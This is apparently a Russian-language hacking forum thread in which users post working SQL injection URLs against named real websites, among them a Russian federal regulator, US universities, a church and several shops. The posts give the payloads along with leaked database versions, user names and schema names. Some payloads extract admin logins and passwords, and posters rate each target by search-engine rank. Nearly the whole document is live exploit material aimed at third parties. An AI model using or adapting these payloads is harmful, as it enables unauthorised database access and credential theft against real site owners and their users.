Code: http://www.syriacorthodox-mlb.org/news.php?id=-793+union+select+1,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,3,4,5,6-- asmarpr1_syriac@localhost : asmarpr1_syriac : 5.1.66-cll
gosnadzor.ru Федеральная служба по экологическому, технологическому и атомному надзору России PHP: http://szap.gosnadzor.ru/news/terrnews.html?id=828+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+ Яндекс тИЦ (CY) 3500 Google PageRank (PR) 6 5.1.66
Code: http://www.belifrost.com/p roducts.php?id=-1 4+u nion+sel ect+1, C ONCAT_WS%28C HA R%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7, 8-- asmarpr1_belif@localhost : asmarpr1_belifrost : 5.1.66-cll
http://www.windward-islands.net/crewed/yacht-us.php?ID=-254+union+select+1,2,3,login,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+Admin+limit+0,1--+ PR:4 ТИЦ:10
Code: http://www.360.is/index.php?pid=261&cid=-2141+union+select+1,2,3,4,5,6,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,datab ase%28 %29,versi on%28%29%29,8,9,10, 1 1,12,13,14--
Code: http://www.stock-software.com/news/subcategory.php?subcatid=186+and+1=2+union+select+1,user%28%29,3,4+--+ http://www.wholesalewigs.net/ViewItem.php?ItemID=219%27+and+1=2+UNION%20SELECT%201,2,3,4,5,user%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+&subbrand=20&brandname=Revlon&brandid=16&brandtype=1&source=index.php
Code: h ttp: //www.firstgulf .com/search-d etails.ph p?id=-23+un ion+select+1,ve rsion(),u ser(),4,da tabase(),6,7,8,9,10,11--
Code: http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15+--+ http://www.dialysisunits.com/unit.php?id=-12552+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+--+ http://landscrona.ru/media/index.php?id=-3594+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15+--+ http://www.pcidatabase.com/vendor_details.php?id=-606+union+select+1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15+--+
Платная модульная CMS. Множественные уязвимости. Добраться до исходников для полноценного репорта не получилось, поэтому только самое критичное (хотя её, судя по всему, не особенно и покупают). SQL-инъекция через заголовок X-Forwarded-For в одном из скриптов сбора статистики; сервер к тому же отдаёт клиенту необработанный текст ошибки СУБД. Request Headers: Host:www.jcms.ru X-Forwarded-For: 127.0.0.1')on duplicate key update h=(select 1 from(select count(*),concat((select(select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)h)# Response Content: <h1>Software error:</h1> <pre>DBD::mysql::st execute failed: Duplicate entry '5.0.901' for key 1 at /MySQL.cgi line 12. </pre> SQL-инъекция в демо-админке: PHP: http://demo.jcms.ru/cgi-bin/admin.cgi?login=demo&password=demo&action=photogallery_photogallery_edit&JCMSPhotoGalleryAlbumId=-3' union select 1,version(),3,4,5,6,7,8,9,10+--+h Главная админка: http://jcms.ru/cgi-bin/admin.cgi Разработчик уведомлён, реакции не последовало.
подыскивая себе водный транспорт, наткнулся на это... http://www.wellboat-spb.ru/caters.php?id=-20%20and%201=2%20union%20select%201,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20-- 5.0.77-log wellboat_spb@localhost wellboat_spb pc-linux-gnu
http://www.asra.com/e-news.php?id=-2+union+select+1,@@version,3,4,5,user()+--+ //root http://www.casatuscany.com/about/page.php?id=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+ //4.1 http://www.bbkingblues.com/bio.php?id=-2388+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+--+ //4.1 http://www.carkitinc.com/carkit2.php?id=-12+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17+--+
http://www.i-teco.ru/news-arh.php?id=999999.9' union all select (select concat(0x27,0x7e,unhex(Hex(cast(wpb_users.user_login as char))),0x5e,unhex(Hex(cast(wpb_users.user_pass as char))),0x5e,unhex(Hex(cast(wpb_users.user_email as char))),0x5e,unhex(Hex(cast(wpb_users.user_nicename as char))),0x27,0x7e) from `structure_i`.wpb_users limit 0,1) ,0x31303235343830303536,0x31303235343830303536-- a http://brown.edu/scs/undergrad/catalog/course.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(version() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1 // 2 поста подряд с разницей в пару часов // Я за тебя объединять должен ? // BigBear извиняй
http://www.ku.edu/ - The University of Kansas Яндекс тИЦ (CY): 350 Google PageRank (PR): 7 boolean-based blind Code: http://www.ku.edu/academics/?school=1')+and+1=1+and+(''=' http://www.ku.edu/academics/?school=1')+RLIKE+IF(1=1,0x4d7953514c,0x28)+and+('1'='1 web server operating system: Linux Red Hat Enterprise 6 (Santiago) web application technology: PHP 5.3.3, Apache 2.2.15 back-end DBMS: MySQL 4.1.13-standard
Яндекс тИЦ (CY) 550 Google PageRank (PR) 6 http://www.world-history.ru/persons_about.phtml?Id_article=999999.9 union all select (select concat(0x27,0x7e,unhex(Hex(cast(users.login as char))),0x5e,unhex(Hex(cast(users.password as char))),0x27,0x7e) from `history`.users limit 1,1) --
На сайте присутствует WAF и 3-5к трафика Code: http://www.lingvotech.com/index.php?section=docs&page=1&id_refer=6356%0dand(extractvalue(1,concat(0x3a,(select+/*!table_name*/+from+information_schema.`tables`+/*!where*/+table_schema=0x617634395f6c696e67766f+limit+0,1))))# Version: 5.1.66-cll Database: av49_lingvo User: av49_lingvo@localhost CY - 160 PR - 0
Скуля: http://www.numismat-invest.ru/aukcion.php?id=0'+union+select+1,2,3,4,5,concat(0x7e,version(),0x7c,user(),0x7c,database(),0x7e),7,8/* version: 5.0.45-community-nt-log user: [email protected] database: 1gb_niko GooglePR: 1 YandexCY: 10 Скуля: http://www.mmc-rspp.ru/bistubiseng.php?id=0'+union+select+1,2,3,concat(0x7e,version(),0x7c,user(),0x7c,database(),0x7e),5,6,7+--+ version: 5.1.65 user: admin_mmtrours@localhost database: admin_cmsmmcrspp GooglePR: 3 YandexCY: 50 Скуля: http://filerootspeed.ru/post.php?id=0'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x7e,version(),0x7c,user(),0x7c,database(),0x7e),16,17+--+ version: 5.1.66-cll user: exarh758_dor1@localhost database: exarh758_filerootspeed GooglePR: 0 YandexCY: 0 Скуля: http://www.blenheims.co.uk/leaseholdersandresidents/details.php?id=0+union+select+1,2,3,concat(0x7e,version(),0x7c,user(),0x7c,database(),0x7e) version: 5.1.66-cll user: groupbh_user@localhost GooglePR: 1 YandexCY: 0
Яндекс тИЦ (CY) - 2000 Google PageRank (PR) - 6 http://bards.ru/' or 1=convert(int,@@version) and '1'='1 http://bards.ru/' or 1=convert(int,(char(126)+(select distinct top 1 table_name from (select distinct top 77 table_name from information_schema.tables order BY table_name ASC) sq order BY table_name DESC)+char(126))) and '1'='1
Code: http://mercerproducts.com.au/details.php?id=-23+union+select+1,version(),3,4,5-- PHP/5.2.13-0.dotdeb.0 5.0.51a-24+lenny5 adzmer043@localhost richardhayes
Скуля: http://www.satcommobil.com/rentals.php?id=0+union+select+1,concat(0x7e,version(),0x7c,user(),0x7c,database(),0x7e),3,4,5,6 version: 4.1.24-log user: [email protected] database: satcommobil Домен: www.satcommobil.com GooglePR: 0 YandexCY: 0 Скуля: http://telefon.sputnik-video.ru/index.php?id=0+union+select+1,2,3,4,5,6,concat(0x7e,version(),0x7c,user(),0x7c,database(),0x7e),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+--+ version: 5.0.96-community-log user: sputnik@localhost database: sputnik_test Домен: telefon.sputnik-video.ru GooglePR: 2 YandexCY: 0 Скуля: http://ausasustainingmembers.searchablelisting.com/viewDetails.php?id=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(0x7e,version(),0x7c,user(),0x7c,database(),0x7e),17,18 version: 5.0.96-log user: [email protected] database: db448644008 Домен: ausasustainingmembers.searchablelisting.com GooglePR: 4 YandexCY: 0 Скуля: http://www.experiencedevelopment.org/news_stories_detail.php?id=0+union+select+1,2,concat(0x7e,version(),0x7c,user(),0x7c,database(),0x7e),4 version: 5.0.77 user: expdev@localhost database: experiencedevelopment Домен: www.experiencedevelopment.org GooglePR: 5 YandexCY: 0 Скуля: http://www.jpscu.com/page.php?id=0'+union+select+1,concat(0x7e,version(),0x7c,user(),0x7c,database(),0x7e),3/* version: 4.1.22 user: jpscocu@localhost database: jpscu Домен: www.jpscu.com GooglePR: 1 YandexCY: 0 // СГЕНЕРИРОВАНО МОДЕРАТОРОМ BigBear // У меня терпение не железное...
Code: http://www .uls.or .ug/details.php?load=uls&id=-23+uni on+select+1,2,3,4,5,version(),7,user(),9,10,11,12,13,14,15,16,database()-- 5.1.66-cll law2012_koleman law2012_sindtalo@localhost